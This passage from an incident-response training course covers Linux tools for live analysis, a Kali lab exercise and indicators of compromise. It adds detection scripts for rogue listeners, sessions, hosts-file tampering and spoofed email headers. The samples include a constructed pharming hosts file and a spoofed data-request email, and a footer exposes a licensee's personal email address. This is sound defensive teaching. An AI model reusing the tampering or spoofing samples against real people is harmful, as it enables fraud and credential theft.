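    user: str
    fd: str
    node: str   # TCP or UDP for network sockets
    name: str   # lsof's NAME column: local[->remote] [(STATE)]

    @property
    def tcp_state(self):
        m = re.search(r"\((\w+)\)$", self.name)
        return m.group(1) if m else None

    @property
    def local_port(self):
        local = self.name.split("->")[0].split(" ")[0]   # "*:22" or "10.0.0.5:44812"
        return int(local.rsplit(":", 1)[1])

    @property
    def remote_endpoint(self):
        if "->" not in self.name:
            return None
        return self.name.split("->")[1].split(" ")[0]


def parse_lsof(text):
    """Parse the default column layout. NAME is the last column and may contain
    spaces, so each line is split into at most nine fields."""
    records = []
    for line in text.splitlines()[1:]:        # first line is the column header
        parts = line.split(None, 8)
        if len(parts) < 9:
            continue                          # short or malformed row
        records.append(OpenFile(parts[0], int(parts[1]), parts[2], parts[3], parts[7], parts[8]))
    return records


def select(records, user=None, pid=None):
    """Equivalent of `lsof -u USER -a -p PID`: -a ANDs the selections, so a record
    must satisfy every condition that was given."""
    return [r for r in records
            if (user is None or r.user == user) and (pid is None or r.pid == pid)]


def unexpected_listeners(records, expected=EXPECTED_LISTENERS):
    """Listening TCP sockets absent from the baseline, as (command, pid, port)."""
    return sorted({(r.command, r.pid, r.local_port) for r in records
                   if r.tcp_state == "LISTEN" and (r.command, r.local_port) not in expected})


def established_peers(records):
    """Remote endpoints per process, for comparison with the host's known-good peers."""
    peers = {}
    for r in records:
        if r.tcp_state == "ESTABLISHED" and r.remote_endpoint:
            peers.setdefault((r.command, r.pid), []).append(r.remote_endpoint)
    return peers


if __name__ == "__main__":
    recs = parse_lsof(SAMPLE_LSOF)
    for r in select(recs, user="root", pid=533):
        print(r.fd, r.node, r.name)
    print("unexpected listeners:", unexpected_listeners(recs))
    print("established peers:", established_peers(recs))
```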

Figure 9-8: Using lsof to display open files for a particular process and user.

Aside from live analysis of a Linux file system, you may need to make a secure copy in order to
preserve the integrity of the file system. The dd command in Linux enables you to make full copies
of individual files or entire drives. If you copy individual files, you can retain their file format like
any standard copy operation; if you copy entire drives or partitions, you can clone them by creating
a drive image, like an ISO. The syntax of a standard copy using dd is as follows:
dd if=/dev/sr1 of=drive-image.iso
A more recent fork of dd is dcfldd, which provides additional features like multiple output files and
exact match verification.


Drive Usage Tools


Linux distributions come with a couple of basic command-line tools for checking drive usage: df
and du. With df, you can retrieve how much drive space is being used by all mounted file systems,
as well as how much space is available for each. The du command enables you to retrieve how much
drive space each directory is using based on the directory you specify. So, if you want to know how
large your /var/log/ folder is, you'd enter du /var/log.
Third-party Linux packages also offer a visual overview of the file system, much like what's available
in Windows. For example, QDirStat is like WinDirStat in that it can display file/folder sizes relative

to others using charts and graphs. Some Linux distributions that use the Gnome desktop come with
Disk Usage Analyzer, formerly named Baobab, which also depicts file and folder sizes in both a list

and graphical format. For KDE environments, a similar tool called Filelight is available.

Process Analysis Tools for Linux

Like on Windows, Linux processes are an instance of an application that is currently running. A
basic command for listing current processes is ps. To get a full list of all running processes for all
users, use the -A option. The command comes with options to specify output formatting, but the
default output behavior retrieves the process ID, the TTY (which terminal executed the process),
the execution time of the process, and the name of the process itself. You can filter the results by
these fields—for example, to find the process ID of cron, you'd enter ps -C cron. You can also
sort results by piping in the sort command—for example, to find the processes that are resulting in
the most CPU overhead, you can enter ps -A | sort -k 3 to sort by column 3 (execution time).

Using the ps command is a quick and simple way to query the OS to identify any process-related
anomalies. An unknown or dubious process may indicate the host is compromised, especially if it's
consuming a great deal of processing time.
A static list provided by ps can be useful, but what if you want to monitor processes in real time,
rather than executing the command every few seconds? The top command does just that. It creates
a scrollable table of each and every running process, and it is constantly refreshed so you see the
most up-to-date statistics. The default information provided by the table includes the process ID,
user, percentage of CPU being used, percentage of memory being used, execution time, and more
about each process.


Like ps, you can filter and sort the output of top to only display the information relevant to you.
Since the top command has some amount of interactivity, you simply need to type a capital P while
the command is running to sort the table by CPU usage. Monitoring the real-time CPU usage of
running processes is an effective way to compare a computer's execution overhead with another
baseline environment. If the CPU usage of certain processes, or all processes as a whole, far exceeds
the comparable baseline, then this may be a sign of exploitation.


Note: Some Linux distributions also come with htop, a more interactive version of top.

Figure 9-9: The top command sorting the real-time process table by CPU usage.

Malware Analysis Tools for Linux

Malware doesn't target Linux to the same degree as Windows, so there aren't many worthwhile
end-user anti-malware solutions out there. However, you can still use Linux tools to analyze malicious
software.

For example, you can use strings to retrieve the executable's strings in a static analysis, or you can
use a tool like grep to search and filter for text data embedded in an executable. There are also
many disassemblers available for Linux, including the GNU Debugger (GDB) and a Unix-like

version of IDA. The U.S. National Security Agency (NSA) also developed and released a cross-
platform reverse engineering tool called Ghidra as open source software in 2019.
As far as sandboxing malware goes, you can use one of several Linux-based virtualization platforms,
including QEMU and Kernel-Based Virtual Machine (KVM). There are also versions of VirtualBox
and VMware available for Unix-like systems.

Figure 9-10: Using the strings command to search for Registry-related strings in an executable
file.


Volatile Memory Analysis Tools for Linux


Some of the volatile memory analysis tools you've seen for Windows, like Belkasoft Evidence
Center and Volatility, are also compatible with the Linux platform. The dcfldd command can also
work with certain Linux kernel modules to capture a system's memory into an image.
However, most Linux distributions come packaged with a command called free, which outputs a
summary of the amount of used and freely available memory on the computer. It retrieves this
information from /proc/meminfo and divides information between physical memory and swap
memory. By default, the information output of free is as follows:

• The total memory available.

• The total memory being used.
• The total memory going unused.
• The amount of memory used by temporary files.

• The amount of memory used by kernel buffers and the page cache.
• The amount of estimated memory available for new processes, taking into account the page cache.

Note: Like many Linux tools, you can use the -h switch with free to make the output more
human readable.

Figure 9-11: Displaying a system's memory usage with the free command.

While free does not enable you to analyze a system's memory bit for bit, its high-level overview of
memory usage can help you troubleshoot slow system performance, a potential symptom of
malware compromise. Consider using free in tandem with top to confirm both excessive CPU and
memory usage when you suspect an incident may be causing the system to freeze, crash, or
otherwise operate non-responsively.

Session Analysis Tools for Linux


There are times when you'll need to verify what users or entities are currently logged in to a Linux
machine. As part of persistence and other post-attack processes, attackers may leave rogue accounts
running on a system. Depending on these accounts' access rights, the attacker could use them to
further compromise the system or its other users, or they could be using the system as a launching
point from which to continue moving laterally throughout the network. Whatever the case may be,
monitoring for suspicious logged-in entities can alert you to malicious behavior.
Linux distributions come with a few built-in session management tools for quick and easy access to
this information. In fact, there are three commands that perform approximately the same function,
with a few key differences: who, w, and rwho.

The who command, by default, shows what user accounts are logged in, what TTYs they have active
for each running process, and what date/time they logged in. The w command displays the same
basic information, but also returns the remote host (if applicable), how long the account has been
idle, the names of processes the account is actively running, the execution time of each process, and
more. You can filter the results by account name (e.g., w root). Lastly, rwho runs on a client/server
architecture—a host runs the rwhod server, and the client runs the rwho -a command to retrieve
active account information for all hosts on the local network. The output of rwho is similar to who.


Figure 9-12: The w command revealing an unknown account (hjkla) logged in from a remote
machine (10.39.5.10).

The lastlog Command

Even if you don't catch a rogue account when it's logged in, you can still retrieve login history from
the /var/log/lastlog file using the lastlog command. This command will list the account name,
TTY, remote host (if applicable), and the last time the user logged in. You can also filter these
results by more than n days old (-b) and less than n days old (-t). Attackers may not allow their
rogue accounts to stick around precisely because they fear active monitoring; so, even after they've
quickly entered and left a system, you can still detect the traces of their intrusion with lastlog.
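As an added example covering both the w output and the lastlog history just described (it is not code from the course), the following Python parses constructed w and lastlog output using the header's column offsets, so the blank FROM field of a console login does not shift the other fields, and flags accounts missing from an assumed baseline or logging in from outside an assumed management network (10.39.0.0/16, the range used in Figure 9-12). The account names, addresses and timestamps are constructed.

```python
"""Session triage over constructed `w` and `lastlog` output (added example):
flag logged-in or previously logged-in accounts that are not in the host's
baseline, and sessions that originate outside the expected management network."""
import ipaddress

# Constructed samples (not captured from a real host). Column widths follow the
# header line, which is how parse_columns() locates each field.
SAMPLE_W = """\
 10:42:11 up 3 days,  4:10,  4 users,  load average: 0.08, 0.03, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU  WHAT
jsmith   tty2                      09:15    1:27m  0.20s  0.05s bash
jsmith   pts/0    10.39.1.20       09:20    3.00s  0.15s  0.02s w
hjkla    pts/1    10.39.5.10       10:31    0.00s  0.10s  0.10s -bash
backup   pts/2    198.51.100.23    02:07    8:12m  0.05s  0.01s sleep 300
"""

SAMPLE_LASTLOG = """\
Username         Port     From             Latest
root             tty1                      Mon Mar  2 08:01:12 +0000 2020
jsmith           pts/0    10.39.1.20       Tue Mar  3 09:20:44 +0000 2020
hjkla            pts/1    10.39.5.10       Tue Mar  3 10:31:07 +0000 2020
daemon                                     **Never logged in**
"""

EXPECTED_ACCOUNTS = {"root", "jsmith", "backup", "daemon"}   # assumed account baseline
MGMT_NETWORK = ipaddress.ip_network("10.39.0.0/16")           # assumed allowed login sources


def parse_columns(text, header_index=0):
    """Split fixed-width tool output using the header's column offsets, so a blank
    field (for example FROM on a console login) does not shift the fields after it."""
    lines = text.splitlines()
    header = lines[header_index]
    names = header.split()
    starts = [header.index(name) for name in names]
    rows = []
    for line in lines[header_index + 1:]:
        if not line.strip():
            continue
        row = {}
        for i, name in enumerate(names):
            end = starts[i + 1] if i + 1 < len(names) else None
            row[name] = line[starts[i]:end].strip()
        rows.append(row)
    return rows


def source_is_allowed(source):
    """Console logins (empty FROM) and addresses inside the management network are expected."""
    if source == "":
        return True
    try:
        return ipaddress.ip_address(source) in MGMT_NETWORK
    except ValueError:          # a hostname rather than an address: treat as unverified
        return False


def review_sessions(w_output, expected=EXPECTED_ACCOUNTS):
    """Return (user, tty, source, reason) for each live session that needs a closer look."""
    findings = []
    for row in parse_columns(w_output, header_index=1):   # line 0 of `w` is the uptime summary
        if row["USER"] not in expected:
            findings.append((row["USER"], row["TTY"], row["FROM"], "account not in baseline"))
        elif not source_is_allowed(row["FROM"]):
            findings.append((row["USER"], row["TTY"], row["FROM"], "login from outside management network"))
    return findings


def review_lastlog(lastlog_output, expected=EXPECTED_ACCOUNTS):
    """Accounts unknown to the baseline that have logged in at least once: the trace a
    short-lived rogue account leaves behind even after it has logged out."""
    return [(row["Username"], row["From"], row["Latest"])
            for row in parse_columns(lastlog_output)
            if row["Username"] not in expected and row["Latest"] != "**Never logged in**"]


if __name__ == "__main__":
    for finding in review_sessions(SAMPLE_W) + review_lastlog(SAMPLE_LASTLOG):
        print(finding)
```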

Network Analysis Tools for Linux

The following table lists some of the network analysis tools available for Linux. Depending on the
distribution you use, some of these tools may not be installed by default.

Tool How It Applies to Network Analysis

Wireshark Wireshark on Linux provides essentially the same functionality as it does
on Windows. Some security-based Linux distributions, like Kali Linux™,
come pre-packaged with Wireshark.

tcpdump This is a command-line packet analyzer, similar in purpose to Wireshark.
It offers much the same information on each packet, including source,
destination, protocol, and contents. However, it is more limited in
functionality compared to Wireshark, especially in its sorting and filtering
options. Still, it's useful as a quick and simple way to capture and analyze
network packets.

Nmap Like Wireshark, Nmap is not significantly different between platforms.
Distributions like Kali Linux come with Nmap installed, as well as
Zenmap, its GUI counterpart.

Kismet Kismet is an open source multi-purpose wireless networking tool for
Unix-based systems. It can identify devices, sniff packets, function as a
wireless IDS, and perform wardriving. In addition to Wi-Fi, Kismet also
works with other wireless protocols used in personal computing like
Bluetooth.

Aircrack-ng Aircrack-ng is an open source wireless networking suite primarily known
for its Wi-Fi cracking utilities, but also has utilities that can detect
network devices and sniff packets.

iPerf This is also a cross-platform tool that offers the same basic functionality.
Linux distributions that are geared toward network testing, like
StressLinux, may come with iPerf installed.


ip Using ip a, this command performs a similar function to Windows'
ipconfig—displaying information about a device's network interfaces,
including the IP address, netmask, and MAC address. The format of how
information is presented is different, however, and you may need to
adjust when going from one platform to another. The ip command also
has many other options for retrieving network information, including
route for retrieving routing table entries, rule for retrieving routing
policy rules, neigh for retrieving the ARP cache, and many more.
Note: The ip command is intended to replace the deprecated
ifconfig command, which is still available on many Linux
distributions.

netstat Again, this tool is essentially the same as with Windows, but it tends to be
more verbose in its default settings. The format of some of the options
also differs, so ensure that you review its manual page beforehand. A
newer command meant to replace netstat on Linux is ss, which can
query the kernel directly and therefore provide a quicker response. It can
also display more statistics about TCP sockets and connection states than
netstat.

traceroute This is essentially the same as Windows' tracert. The main difference is
that, on Windows, tracert uses ICMP echos, whereas traceroute on
Linux uses UDP datagrams over ports 33434 and 33435. This may end
up failing if the firewall blocks higher-number UDP ports. Most
implementations of traceroute do have an option to use ICMP echo
requests instead.
arp Like its Windows counterpart, this tool displays the system's ARP cache.
The default behavior in Linux is to display the cache for all available
interfaces.


ACTIVITY 9-2
Analyzing Incidents with Linux-Based Tools

Before You Begin

You'll be using your Kali Linux VM for this activity.

Scenario
Although many of the servers and workstations that Develetech runs are Windows-based, even
more are run on the Linux platform. It's your job to monitor these servers for malicious activity.
First, you'll start by analyzing each system's network interface for any suspicious configurations.
Next, you'll look at a live feed of the processes running on your systems to detect any anomalous or
unwanted behavior. Lastly, you'll examine the network communications between your Linux
systems so you may identify malicious traffic.
Because you cannot ensure each and every Linux system has Wireshark installed (or should waste
resources installing it), you'll use the leaner tcpdump command-line tool built into most Linux
distributions. Using these various Linux-based tools will ensure your main server infrastructure is
being continuously monitored for incidents.

1. Manipulate your Kali Linux VM's network interfaces.
a) On your Kali Linux VM, open a terminal.
b) At the terminal, enter ip a

c) Verify the names and addresses of the main interfaces. The eth0 interface is the main interface that
the VM communicates with. The docker0 interface is the network interface for Docker containers.
The lo interface is the loopback interface that defines the localhost address (127.0.0.1).

d) Enter sudo ip link set eth0 down


e) Enter ip a and verify that the eth0 interface is marked as DOWN.
f) Enter sudo ip link set eth0 up to reactivate the interface.

2. Enter ip link set help


How would you change the maximum transmission unit (MTU) for the eth0
interface to 512?
A: sudo ip link set eth0 mtu 512

3. Enter the command you came up with in the previous step. Enter ip a to
verify your changes, and then reset the MTU to 1500.

How might you use the ip command to analyze a potential attack?



A: Answers may vary. If any of the interfaces on a host are not configured properly when compared
to their baseline, this could indicate a compromise. Settings like the IP address, MTU, and MAC
address could be altered by an attacker to intercept communications or turn the host into a botnet
zombie under some remote server's control. Abnormal packet transmission totals or excessive
packet loss errors could indicate likewise.

4. Retrieve a static list of processes on the system.


a) At the prompt, enter ps aux


The a flag selects all processes with a terminal. The u flag shows the user or owner of the process.
The x flag adds onto the a flag by also showing processes that do not have a terminal.
b) Verify that you can see a static list of processes, including information about each process's user,
CPU usage, memory usage, start date and time, command, and more.

5. Retrieve a real-time list of running processes on the system.
a) At the prompt, enter top
b) Verify that you can see a continually updating table of processes.
Note: The screenshots of the ps and top commands may not exactly match what students see.


Unlike ps, top provides process information in real time.


c) Open the Firefox ESR browser and navigate to google.com.

d) Verify that Firefox ESR now shows up as a process from the top command, and that you can see
its CPU and memory usage.

e) Start other applications like the file manager (Thunar), Mousepad, Metasploit, and more. Examine
how each one affects CPU and memory usage.

Note: The Metasploit process is listed as ruby, as this is the programming
language that Metasploit and its scripts are written in.

f) Press q or Ctrl+C to terminate the top program.

6. How might you use the top command to detect malicious activity?
A: Answers may vary, but one of the most common ways to detect malicious activity is by watching
the memory and CPU usage of processes running on the system. You may be able to spot
suspicious processes that are taking up too many resources.

7. Start a live packet capture.


a) At the terminal, enter tcpdump -D and verify the available interfaces to capture on.

You'll be capturing on the eth0 interface, but you could also capture on all interfaces by not
specifying one.
b) Enter sudo tcpdump -i eth0

c) Open another terminal.


d) Ping three or four different public domains.
Examples: google.com, cisco.com, amazon.com, and wikipedia.org.
e) Verify that tcpdump is capturing the traffic from the sites you pinged.

f) Press Ctrl+C to end the capture.

8. Start another live capture, this time saving the data to a file.
a) At the terminal, enter sudo tcpdump -w /home/kali/Desktop/capture1.pcap -i eth0
The -w flag saves the capture information as a .pcap file for later examination using tcpdump or

Wireshark.
b) Generate more traffic by pinging the domains again.
c) Enter traceroute google.com and verify that you can see the various hops along the route to
Google's web servers.
Note: If traceroute isn't producing results, have students add the -I flag at the end of the
command to use ICMP echo requests.


d) Return to the tcpdump command prompt and press Ctrl+C to end the capture.

9. Compare using tcpdump and Wireshark to analyze a packet capture.
a) Double-click the capture1.pcap file on the desktop to open it in Wireshark.
b) Verify that you can see your capture in Wireshark.
Note: If the packet capture file doesn't visually appear on the desktop, have students open
Wireshark and then open the packet capture file from there.

tr
is
D
or
e
c) Return to a terminal and enter tcpdump -r /home/kali/Desktop/capture1.pcap

The -r flag tells tcpdump to open a capture from a file and display it in the terminal.

10. Note the difference between how tcpdump and Wireshark display packet contents.
What other Linux tools and commands could you use to search the capture if
you didn't have access to Wireshark?


A: Answers may vary, but using grep to search the capture for specific addresses, protocols, or
other details, and cut to trim the output, would be useful.

11. Close all open windows in Kali Linux.



TOPIC C
Analyze Indicators of Compromise
Now that you know the tools and techniques of active analysis, you can begin to apply them to
situations that may show signs of an attack. In this topic, you'll take a closer look at these situations
so you can make more informed decisions about how to respond.

Indicators of Compromise (IOCs)
Indicators of compromise (IOCs) are any residual sign that an asset or network has been
successfully attacked or is continuing to be attacked. IOCs can be definite and objectively
identifiable, like malware signatures, but many IOCs require subjective judgment calls based on the
analyst's experience and knowledge of organizational systems. Because these IOCs are often
identified through anomalies rather than overt incidents, they can be open to interpretation.
Therefore, it's important, whenever possible, to correlate multiple situations together to produce a
more complete and accurate narrative of events, and to help you avoid false positives and other
common analysis pitfalls. Still, you may find that all you have to go on are individual, isolated IOCs—these
are the ones that require the most focused and careful analysis.
As there are many different targets and vectors of an attack, so too are there many different
potential IOCs. The following is a list of some of the most common or major IOCs that you may
encounter:
• Unauthorized software and files.
• Suspicious emails.
• Suspicious Registry entries.

• Unknown port and protocol usage.


• Excessive bandwidth usage.
• Service disruption and defacement.

• Rogue hardware.
• Suspicious or unauthorized account usage.

IOC Tools
There are tools that can help you identify IOCs. Likewise, the OpenIOC framework provides a
standardized format for defining new IOCs as the threat landscape evolves. For example, FireEye
provides IOC Finder for collecting host data and detecting the presence of IOCs; IOC writer for
creating definitions in the OpenIOC format; and IOC Editor for managing IOC data. You can also
share IOC data with other cybersecurity professionals using community-driven threat intelligence
sites like IOC Bucket (https://iocbucket.com/).



Threat Hunting
Threat hunting, also called hunt teaming, is a technique that facilitates detection of anomalous
and/or malicious behavior. Instead of passively monitoring entities and systems, a team of security
personnel will actively "hunt" for indicators of compromise in a particular environment. This is
based on the assumption that you may already be compromised, even if you don't notice any overt
signs of an incident. A hunt team will typically examine hosts and network activity for evidence of
command and control (C&C) channels used in a botnet; unusual Registry keys that could indicate
persistent malware; rogue hardware that is attached to the network; and more.


Unauthorized Software and Files


One of the most glaring IOCs is the presence of known malicious software on a system. For the
most part, this will be worms, viruses, or Trojans that are currently propagating in the wild and have
successfully made it into your perimeter. Any malicious software, whether detected by a typical scan
or by more active monitoring and analysis, should immediately be treated as an IOC. This is
especially true for malware that has made its way onto mission-critical assets like web servers and
financial databases. The presence of malware doesn't always indicate you have a significant crisis on
your hands, but it should at the very least prompt you to act quickly and decisively in order to find
out what it does and how you can contain and eliminate it.

A more subtle software-based IOC involves the presence of attack tools on a system. If an analyst
or an automated monitoring system detects, for instance, High Orbit Ion Cannon (HOIC) or some
other distributed denial of service (DDoS) application on an end user's workstation, it may suggest
an insider threat. However, an external attacker may be using this host as a staging point for more
attacks without the user's knowledge. Either way, the key thing to look out for is the presence of
attack tools in suspicious contexts. It makes sense for a penetration tester to have this tool on their
system, but not an employee from the Accounting department. Keep in mind that the term "attack
tools" is often a matter of the person's intent—the same tools, after all, may be used by security
personnel to defend the network.
Unauthorized software doesn't always have to mean overt malware. Clever attackers can make
modifications to existing files to facilitate their attack. For example, a hosts file is a perfectly normal
file to see on a client machine. However, an attacker can modify this file to initiate a pharming
attack, and all of a sudden the legitimate file is being used in a malicious way. Occasionally, attackers
or malware will leave behind suspicious files during or after an attack. The suspicious file may
indicate advanced persistent threat (APT) activity, or may simply be carelessness and a failure to
properly cover one's tracks; for example, a Trojan may install a rootkit via some innocuous-looking
file, but then forget to clean up Registry entries for the Trojan after the rootkit is installed. Host
intrusion detection systems (HIDSs) are specifically designed to monitor changes to important files
or the creation of unknown files.
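An added example of detecting the kind of hosts-file tampering shown in Figure 9-13 (this is not code from the course): it parses a constructed hosts file and compares each name-to-address mapping against an assumed known-good baseline and assumed internal address ranges, reporting baseline names that now resolve elsewhere and unknown names pinned to outside addresses. The file contents, the baseline and the 10.39.0.0/16 range are all constructed.

```python
"""Hosts-file tampering check (added example): parse a constructed hosts file and
flag mappings that disagree with an assumed known-good baseline, the pattern
behind a pharming attack that edits a legitimate file rather than dropping malware."""
import ipaddress

# Constructed sample of a tampered hosts file (not taken from a real system).
SAMPLE_HOSTS = """\
127.0.0.1       localhost
127.0.1.1       dt-ws-042.develetech.example dt-ws-042
::1             localhost ip6-localhost ip6-loopback
203.0.113.44    intranet.develetech.example intranet
# updates
203.0.113.44    www.bankofexample.com bankofexample.com
203.0.113.44    login.bankofexample.com
"""

# Assumed known-good mappings for this workstation, captured at build time.
BASELINE = {
    "localhost": {"127.0.0.1", "::1"},
    "ip6-localhost": {"::1"},
    "ip6-loopback": {"::1"},
    "dt-ws-042": {"127.0.1.1"},
    "dt-ws-042.develetech.example": {"127.0.1.1"},
    "intranet": {"10.39.2.15"},
    "intranet.develetech.example": {"10.39.2.15"},
}

# Assumed address ranges a legitimate local mapping may point at.
INTERNAL_NETWORKS = [ipaddress.ip_network(n) for n in ("127.0.0.0/8", "10.39.0.0/16", "::1/128")]


def parse_hosts(text):
    """Return (address, hostname) pairs; comments and blank lines are ignored, a line
    with several names yields one pair per name, and malformed addresses are skipped."""
    pairs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            addr = str(ipaddress.ip_address(fields[0]))
        except ValueError:
            continue
        for name in fields[1:]:
            pairs.append((addr, name.lower()))
    return pairs


def is_internal(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETWORKS)   # version mismatch simply yields False


def find_tampering(text, baseline=BASELINE):
    """Return (name, address, reason) for every mapping that is not in the baseline."""
    findings = []
    for addr, name in parse_hosts(text):
        if addr in baseline.get(name, set()):
            continue                                    # exactly as built: nothing to report
        if name in baseline:
            reason = "baseline name mapped to a different address"
        elif not is_internal(addr):
            reason = "unknown name pinned to an address outside internal ranges"
        else:
            reason = "unknown name not in baseline"
        findings.append((name, addr, reason))
    return findings


if __name__ == "__main__":
    for name, addr, reason in find_tampering(SAMPLE_HOSTS):
        print(f"{name:32} {addr:16} {reason}")
```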



Figure 9-13: A hosts file has been modified maliciously.

IOCs in Startup

Malware often thrives in an environment when it's able to immediately start running even after a
user has restarted the operating system. Otherwise, the malware would likely require some additional
direct action on the user's part to stay active. Therefore, malware usually injects itself into the startup
list of an operating system. Depending on the OS, you can analyze the startup menu for any
programs that either appear malicious or that you can't verify. Tools like the Startup tab in
Windows Task Manager will provide only an incomplete list, so consider using a tool like Autoruns
to see everything that automatically runs at boot.

IOCs in Patches

While many patches are designed to fix security issues, some introduce new vulnerabilities or break
existing security integration and functionality. Unauthorized patching of operating systems and
software to specific versions can indicate an attempt by an attacker to create an opening for their
attack. In doing so, they can create the guise of having engaged in proper security behavior.

IOCs in Metadata
The signs of an attack may also be present in file system metadata rather than the content of files
themselves. For example, the last modified date of a file might be something absurd like 01-01-1900
if the attacker was careless in their attempt to cover their tracks. Or, the indication may be more
subtle, like a last modified date on a weekend when no one should have access to the system.
Besides dates, other metadata like the account that created the file, the size of the file, the length and
encoding information of media like videos, what location a photo was taken in, etc., are all potential
IOCs.

IOCs in Archives and Deleted Files


Attackers may attempt to avoid notice by including malicious files in archive file formats like ZIP or
RAR. If the file were loose, it would be easier to detect; but detecting individual files inside a larger
archive is not as easy for both automated systems and human analysts to do. So, the presence of
unrecognizable or suspicious archive files may be an indicator of compromise. Another way
attackers attempt to avoid detection is by deleting files that may be part of an attack. If you regularly
scan systems for traces of deleted files, you may find evidence that an attack has taken place.

Suspicious Emails

Spam and phishing emails are very common, especially when their target is personnel who oversee
major business operations. Management in your organization will likely be targeted frequently by
attackers looking to steal high-level credentials. Although most email-based social engineering
attempts don't indicate compromise if the target is well trained on how to spot and reject such
attempts, there are certain situations where they actually can be IOCs.

For example, an insider threat may be in contact with someone on the outside, providing them with
confidential information. The insider threat either has access or gains access to a customer account
database that stores personally identifiable information (PII) and banking information. They then
send some of this information via an email body or attachment to their contact on the outside so the
contact doesn't need to break into the network themselves. If you monitor email transmissions for
specific keywords, phrases, or file contents, you may come across an IOC when you start seeing
outbound transmissions that include strings of credit card numbers. Information like this is almost
never communicated over email, and should raise a red flag. You can then verify the employee has
access to the customer account database, and whether or not the flagged information is in the
database. This can help you determine if the employee's credentials are compromised, if the database
is compromised, or both.
It's not just outbound email that can be an IOC. For example, an employee receives an email from
their manager's account that asks them to share confidential information. The message is
uncharacteristic of the manager, being typed poorly and rife with spelling and grammatical errors.
On the surface, this may seem like a standard phishing attempt, but the fact it appears to be sent by
the real account may imply something more. Although email sources can be spoofed, you check the
email server and verify the very same email message was sent from the manager's account to the
recipient employee. Now the threat is more serious, as it appears the manager's account has been
hijacked and is being used for malicious purposes.

Figure 9-14: A suspicious email sent from a legitimate source, indicating that Jack Price's account
may have been hijacked.

Lesson 9: Performing Active Asset and Network Analysis | Topic C


Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
376 | CyberSec First Responder® (Exam CFR-410)

IOCs for Spoofed Messages


As you've seen before, spoofing email messages is relatively easy, and, in many cases, very
convincing. However, spoofed messages are not perfect—they can still leave behind suspicious
values in the email's headers. Headers aren't commonly exposed to the user by most email
applications, which is why they're usually not a factor in an average user's judgment. However,
applications like Microsoft® Outlook® have advanced options that enable you to view headers, and
in some cases, you can save the email message in a common format and open it in a text editor to
view the headers. You can also implement software that inspects headers and triggers an alert if the
headers match known malicious values.

Potential IOCs in an email header include:
• The IP address listed in the Received: from field.
• The Simple Mail Transfer Protocol (SMTP) HELO value, which identifies the sending machine.
• The Received: by field, which lists the chain of computers that sent and received the email until
it reached its destination.

If any of these fields list an IP address or name you recognize as malicious, or fail to recognize as
legitimate, you might have a spoofed message on your hands. The following screenshot highlights
suspicious values that indicate a spoofing tool was used to send the email in the previous figure.

Figure 9-15: Suspicious values indicate a spoofing tool was used to send the email.

Note: Keep in mind that even email headers can be spoofed, so you may be subject to false
negatives.
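
As an added example (not code from the course), the following PowerShell script reads the Received: chain of a raw message and reports the hops whose source IP is not one of the organization's own relays, or whose HELO name disagrees with the reverse DNS the relay recorded. The message, hostnames, addresses and relay allowlist are constructed for illustration.

```powershell
# Added example, not part of the course: parse the Received: chain of a raw
# message and flag hops whose source is not one of our relays, or whose SMTP
# HELO name does not match the reverse DNS the receiving relay recorded.
# The message, hostnames, IPs and allowlist below are constructed.

$RawMessage = @"
Received: from mail.develetech.example (mail.develetech.example [203.0.113.10])
    by mx1.develetech.example with ESMTPS id 4bd2e1; Mon, 4 Mar 2019 03:02:11 +0000
Received: from WIN-SPOOF (unknown [198.51.100.77])
    by mail.develetech.example with SMTP; Mon, 4 Mar 2019 03:02:09 +0000
From: "Jack Price" <jack.price@develetech.example>
To: employee@develetech.example
Subject: need the customer list

send me the customer list asap its urgent
"@

# Relays that legitimately handle the organization's mail (hypothetical values).
$TrustedRelays = @('mx1.develetech.example', 'mail.develetech.example', '203.0.113.10')

function Get-ReceivedHops {
    param([string]$Message)
    # Headers end at the first blank line. Continuation lines start with whitespace
    # and belong to the header above them, so unfold them before matching.
    $HeaderBlock = ($Message -split "`r?`n`r?`n", 2)[0]
    $Unfolded = $HeaderBlock -replace "`r?`n[ \t]+", ' '
    # Each relay prepends its own Received: header, so the top one is the last hop
    # and the bottom one is closest to the real origin.
    foreach ($Line in ($Unfolded -split "`r?`n")) {
        if ($Line -match '^Received:\s+from\s+(?<helo>\S+)(?:\s+\((?<rdns>[^\s\[\]]*)\s*\[(?<ip>[^\]]+)\]\))?\s+by\s+(?<by>\S+)') {
            [pscustomobject]@{
                Helo       = $Matches['helo']   # name the sender announced in SMTP HELO/EHLO
                ReverseDns = $Matches['rdns']   # what the receiving relay resolved the IP to
                SourceIp   = $Matches['ip']     # address the receiving relay actually saw
                ReceivedBy = $Matches['by']     # relay that wrote this header
            }
        }
    }
}

function Test-ReceivedChain {
    param([object[]]$Hops, [string[]]$Trusted)
    foreach ($Hop in $Hops) {
        $Reasons = @()
        $KnownSource = ($Trusted -contains $Hop.SourceIp) -or ($Trusted -contains $Hop.ReverseDns)
        if ($Hop.SourceIp -and -not $KnownSource) {
            $Reasons += "handed to $($Hop.ReceivedBy) by untrusted source $($Hop.SourceIp)"
        }
        if ($Hop.ReverseDns -eq 'unknown') {
            $Reasons += "source $($Hop.SourceIp) has no reverse DNS (HELO '$($Hop.Helo)')"
        }
        elseif ($Hop.ReverseDns -and $Hop.Helo -ne $Hop.ReverseDns) {
            $Reasons += "HELO '$($Hop.Helo)' does not match reverse DNS '$($Hop.ReverseDns)'"
        }
        [pscustomobject]@{
            ReceivedBy = $Hop.ReceivedBy
            SourceIp   = $Hop.SourceIp
            Suspicious = ($Reasons.Count -gt 0)
            Reasons    = ($Reasons -join '; ')
        }
    }
}

# For the sample, the inner hop is reported: our own relay accepted the message
# from an unknown host announcing itself as WIN-SPOOF.
$Hops = Get-ReceivedHops -Message $RawMessage
Test-ReceivedChain -Hops $Hops -Trusted $TrustedRelays | Where-Object Suspicious | Format-List
```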

Suspicious Registry Entries


There are several ways an attacker could use the Windows Registry as a compromise vector, but
certain Registry entries are more common targets than others. The autorun entries in the Registry
are often targeted because they're not always visible to the average user. In modern Windows
systems, there are two types of autorun keys: Run, which initializes its values every time a user logs
in, and RunOnce, which initializes its values on the next user log in, whereupon the key is removed
from the Registry so it does not run again. Examine both to reveal any unknown or suspicious
values that shouldn't be there. More specifically, these keys are located in:
• HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
